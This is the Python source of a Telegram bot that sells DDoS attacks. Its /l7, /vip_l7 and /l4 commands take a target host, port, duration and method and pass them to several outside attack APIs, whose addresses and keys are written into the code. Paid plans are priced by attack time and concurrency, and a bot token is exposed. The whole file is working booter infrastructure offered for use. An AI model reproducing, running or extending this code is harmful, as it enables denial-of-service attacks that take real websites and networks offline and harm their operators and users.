import telebot
import time
import json
import telebot
import datetime
import time
import os
import subprocess
import psutil
import sqlite3
import hashlib
import requests
import sys
import socket
import zipfile
import io
import re
import threading

bot = telebot.TeleBot("7250707250:AAF-qx61txR4yMPx-aBFonbwkDMhB__erdc")

admin_id = 6343573113

allowed_users = []

group_id = -1002178568992

group_send = -1002185176881

start_time = time.time()

@bot.message_handler(commands=["l7"])
def attack(message):
    user_id = message.from_user.id

    if message.chat.id != group_id:
        bot.reply_to(message, "Join: https://t.me/nat_network_VN")
        return

    if len(message.text.split()) < 5:
        bot.reply_to(message, 'example: /l7 https://123.com 443 60 tls')
        return

    args = message.text.split()
    host = args[1]
    port = args[2]
    time = args[3]
    method = args[4]

    if not all([host, port, time, method]):
        bot.reply_to(message, "example: /l7 https://123.com 443 60 tls")
        return

    if int(time) > 61:
        bot.reply_to(message, 'Minimum Attack Time Is 60 Seconds !')
        return

    try:
        port = int(port)
    except ValueError:
        bot.reply_to(message, "Invalid attack port")
        return

    # Kiểm tra port
    if port < 1 or port > 443:
        bot.reply_to(message, "Invalid attack port")
        return


    if method not in ["tls"]:
        bot.reply_to(message, "Invalid attack method")
        return


    # Kiểm tra URL
    if not host.startswith("https://"):
        bot.reply_to(message, "Invalid URL. Please use https:// format.")
        return

    if '.edu' in host or '.gov' in host or 'google' in host or 'youtube' in host or 'baidu' in host or 'amazon' in host or 'zetvideo.net' in host or 'httpddos.lol' in host or 'cloudflare' in host or 'dstat' in host or 'chinhphu' in host or 'cfcybernews.eu' in host or 'forum.cfcybernews.eu' in host or 'seized.ws/nosec' in host or '/nosec' in host or 'graph.vshield.pro' in host or 'kakaka' in host:
        bot.reply_to(message, "Target is blocked.")
        return

    username = message.from_user.username

    args = message.text.split()
    host = args[1]
    port = args[2]
    time = args[3]
    method = args[4]  

    api1 = f"http://103.180.147.134:1111/api/attack?host={host}&port={port}&time={time}&method={method}"
    response = requests.get(api1)

    markup = telebot.types.InlineKeyboardMarkup()
    button = telebot.types.InlineKeyboardButton(text="Check-Host", url=f"https://check-host.net/check-http?host={host}")
    markup.add(button)

    markup = telebot.types.InlineKeyboardMarkup()
    button = telebot.types.InlineKeyboardButton(text="Plan-Vip", url=f"https://t.me/nat_network_VN/3012")
    markup.add(button)

    bot.reply_to(message, f'❗️Attack Sent ❗️\n\nInitiated by: @{message.from_user.username}\nTarget: {host}\nPort: {port}\nDuration: {time}\nMethod: {method}\nPlan: Free', reply_markup=markup)

    bot.send_message(group_send, f"attack information - L7 Free\n@{message.from_user.username}\n- Host: {host}\n- Port: {port}\n- Time: {time}\n- Method: {method}")

@bot.message_handler(commands=["vip_l7"])
def attack(message):
    user_id = message.from_user.id
    if message.from_user.id not in allowed_users:
        bot.reply_to(message, "You do not have permission to use this command /plan.")
        return

    if len(message.text.split()) < 5:
        bot.reply_to(message, 'example: /vip_l7 https://123.com 443 60 tls')
        return

    args = message.text.split()
    host = args[1]
    port = args[2]
    time = args[3]
    method = args[4]

    if not all([host, port, time, method]):
        bot.reply_to(message, "example: /vip_l7 https://123.com 443 60 tls")
        return

    if int(time) > 120:
        bot.reply_to(message, 'Minimum Attack Time Is 60 Seconds !')
        return

    try:
        port = int(port)
    except ValueError:
        bot.reply_to(message, "Invalid attack port")
        return

    # Kiểm tra port
    if port < 1 or port > 443:
        bot.reply_to(message, "Invalid attack port")
        return


    if method not in ["tls", "captcha", "flood"]:
        bot.reply_to(message, "Invalid attack method")
        return


    # Kiểm tra URL
    if not host.startswith("https://"):
        bot.reply_to(message, "Invalid URL. Please use https:// format.")
        return

    username = message.from_user.username

    args = message.text.split()
    host = args[1]
    port = args[2]
    time = args[3]
    method = args[4]  


    api1 = f"http://100.42.183.147:1111/api/attack?host={host}&port={port}&time={time}&method={method}"
    api2 = f"http://103.180.147.119:1111/api/attack?host={host}&port={port}&time={time}&method={method}"
    api3 = f"http://51.68.214.19/api/attack?username=nat&key=nat&host={host}&port={port}&time={time}&method=tls"
    api4 = f"https://phuongthuy.love/api?key=concucc_xc2Azc&host={host}&port={port}&time={time}&method=tls"
    api5 = f"https://dovpoapis.fun/api?username=nat&key=2289&host={host}&port={port}&time={time}&method=HTTP-TLS"

    response = requests.get(api1)
    response = requests.get(api2)
    response = requests.get(api3)
    response = requests.get(api4)
    response = requests.get(api5)

    markup = telebot.types.InlineKeyboardMarkup()
    button = telebot.types.InlineKeyboardButton(text="Check-Host", url=f"https://check-host.net/check-http?host={host}")
    markup.add(button)

    markup = telebot.types.InlineKeyboardMarkup()
    button = telebot.types.InlineKeyboardButton(text="Plan-Vip", url=f"https://t.me/nat_network_VN/3012")
    markup.add(button)

    bot.reply_to(message, f'❗️Attack Sent ❗️\n\nInitiated by: @{message.from_user.username}\nTarget: {host}\nPort: {port}\nDuration: {time}\nMethod: {method}\nPlan: Vip', reply_markup=markup)


    bot.send_message(group_send, f"attack information - L7 Vip\n@{message.from_user.username}\n- Host: {host}\n- Port: {port}\n- Time: {time}\n- Method: {method}")

@bot.message_handler(commands=["l4"])
def attack(message):
    user_id = message.from_user.id
    if message.from_user.id not in allowed_users:
        bot.reply_to(message, "You do not have permission to use this command /plan.")
        return

    if message.chat.id != group_id:
        bot.reply_to(message, "https://t.me/nat_network_VN")
        return

 
    if len(message.text.split()) < 5:
        bot.reply_to(message, 'example: /l4 1.1.1.1 443 60 tcp')
        return

    args = message.text.split()
    host = args[1]
    port = args[2]
    time = args[3]
    method = args[4]

    if not all([host, port, time, method]):
        bot.reply_to(message, "example: /l4 1.1.1.1 443 60 tcp")
        return

    if int(time) > 61:
        bot.reply_to(message, 'Minimum Attack Time Is 60 Seconds !')
        return

    try:
        port = int(port)
    except ValueError:
        bot.reply_to(message, "Invalid attack port")
        return

    # Kiểm tra port
    if port < 1 or port > 100000:
        bot.reply_to(message, "Invalid attack port")
        return


    if method not in ["gudp", "ovh-tcp", "tcp", "socket", "udpbypass", "home"]:
        bot.reply_to(message, "Invalid attack method")
        return

    username = message.from_user.username

    args = message.text.split()
    host = args[1]
    port = args[2]
    time = args[3]
    method = args[4]  

    api = f"http://51.68.214.19/api/attack?username=nat&key=nat&host={host}&port={port}&time={time}&method={method}"
    response = requests.get(api)

    markup = telebot.types.InlineKeyboardMarkup()
    button = telebot.types.InlineKeyboardButton(text="Check-Host", url=f"https://check-host.net/check-http?host={host}")
    markup.add(button)

    markup = telebot.types.InlineKeyboardMarkup()
    button = telebot.types.InlineKeyboardButton(text="Plan-Vip", url=f"https://t.me/nat_network_VN/3012")
    markup.add(button)

    bot.reply_to(message, f'❗️Attack Sent ❗️\n\nInitiated by: @{message.from_user.username}\nTarget: {host}\nPort: {port}\nDuration: {time}\nMethod: {method}\nPlan: Vip', reply_markup=markup)


    bot.send_message(group_send, f"attack information - L4 - Vip\n@{message.from_user.username}\n- Host: {host}\n- Port: {port}\n- Time: {time}\n- Method: {method}")

@bot.message_handler(commands=['start'])
def help(message):
    help_text = '''
/l7 - ddos website
/l4 - ddos ip
/method - method ddos
/plan - plan ddos Vip
/vps - check server vps
/time - time bot on
/profile - check profile
'''
    bot.reply_to(message, help_text)

@bot.message_handler(commands=['vps'])
def help(message):
    help_text = '''
🖥️ Server 1 (xxx.xxx.xxx.xxx): 🟢 Alive
🖥️ Server 2 (xxx.xxx.xxx.xxx): 🟢 Alive
🖥️ Server 3 (xxx.xxx.xxx.xxx): 🟢 Alive
🖥️ Server 4 (xxx.xxx.xxx.xxx): 🟢 Alive
🖥️ Server 5 (xxx.xxx.xxx.xxx): 🟢 Alive
🖥️ Server 6 (xxx.xxx.xxx.xxx): 🛑 Dead
'''
    bot.reply_to(message, help_text)

@bot.message_handler(commands=['profile'])
def help(message):
    help_text = '''
Plan: Free
Concurrents: 1
Boot Time: 60
Network: Free
Api Access: False
Expiration: N/A
'''
    bot.reply_to(message, help_text)

@bot.message_handler(commands=['plan'])
def help(message):
    help_text = '''
Plan Bot Ddos L7 - L4 Telegram

PLAN 1  
Price: $2 or 30k vnđ/days
Concurrent: 1
Attack Time Limit: 60 seconds
Vip : false

PLAN 2
Price: $5 or 120K vnđ/Week
Concurrent: 1
Attack Time Limit: 60 seconds
Vip : false

PLAN 3
Price: $20 or 500K vnđ/Month
Concurrent: 2
Attack Time Limit: 200 seconds
Vip : VIP

Addons
- 1 conc : 100K - 5$
- 60 Attack : 100K - 5$

Api
1Days: 100K - 5$
1Month: 500K - 20$

Buy Dm: @bonecon
'''
    bot.reply_to(message, help_text)


@bot.message_handler(commands=['method'])
def help(message):
    help_text = '''
• L7
• tls
————————————
• L7 VIP
• tls
• flood
• captcha
————————————
• L4
• gudp
• ovh-tcp
• tcp
• socket
• udpbypass
• home

For example: 
/l7 <host> <port> <time> <method>
/l4 <host> <port> <time> <method>
'''
    bot.reply_to(message, help_text)

@bot.message_handler(commands=['add'])
def add_user(message):
    if message.from_user.id == admin_id:
        try:
            user_id = int(message.text.split()[1])  # Lấy ID người dùng từ tin nhắn
            allowed_users.append(user_id)
            bot.reply_to(message, f"Đã thêm ID {user_id} vào danh sách.")
        except (IndexError, ValueError):
            bot.reply_to(message, "Vui lòng nhập ID người dùng.")
    else:
        bot.reply_to(message, "Bạn không có quyền thực hiện lệnh này.")

@bot.message_handler(commands=['remove'])
def remove_user(message):
    if message.from_user.id == admin_id:
        try:
            user_id = int(message.text.split()[1])  # Lấy ID người dùng từ tin nhắn
            allowed_users.remove(user_id)
            bot.reply_to(message, f"Đã xóa ID {user_id} khỏi danh sách.")
        except (IndexError, ValueError):
            bot.reply_to(message, "Vui lòng nhập ID người dùng.")
        except ValueError:
            bot.reply_to(message, "ID người dùng không tồn tại trong danh sách.")
    else:
        bot.reply_to(message, "Bạn không có quyền thực hiện lệnh này.")

@bot.message_handler(commands=['time'])
def uptime(message):
    # Tính toán thời gian bot đã hoạt động
    current_time = time.time()
    uptime_seconds = int(current_time - start_time)

    # Chuyển đổi sang định dạng ngày giờ
    uptime_minutes, uptime_seconds = divmod(uptime_seconds, 60)
    uptime_hours, uptime_minutes = divmod(uptime_minutes, 60)
    uptime_days, uptime_hours = divmod(uptime_hours, 24)

    # Tạo tin nhắn
    uptime_message = f"The bot is up and running :\n"
    if uptime_days > 0:
        uptime_message += f"{uptime_days} Days | "
    if uptime_hours > 0:
        uptime_message += f"{uptime_hours} Hour | "
    if uptime_minutes > 0:
        uptime_message += f"{uptime_minutes} minute | "
    uptime_message += f"{uptime_seconds} second | "

    # Gửi tin nhắn
    bot.reply_to(message, uptime_message)

bot.infinity_polling(timeout=60, long_polling_timeout=1)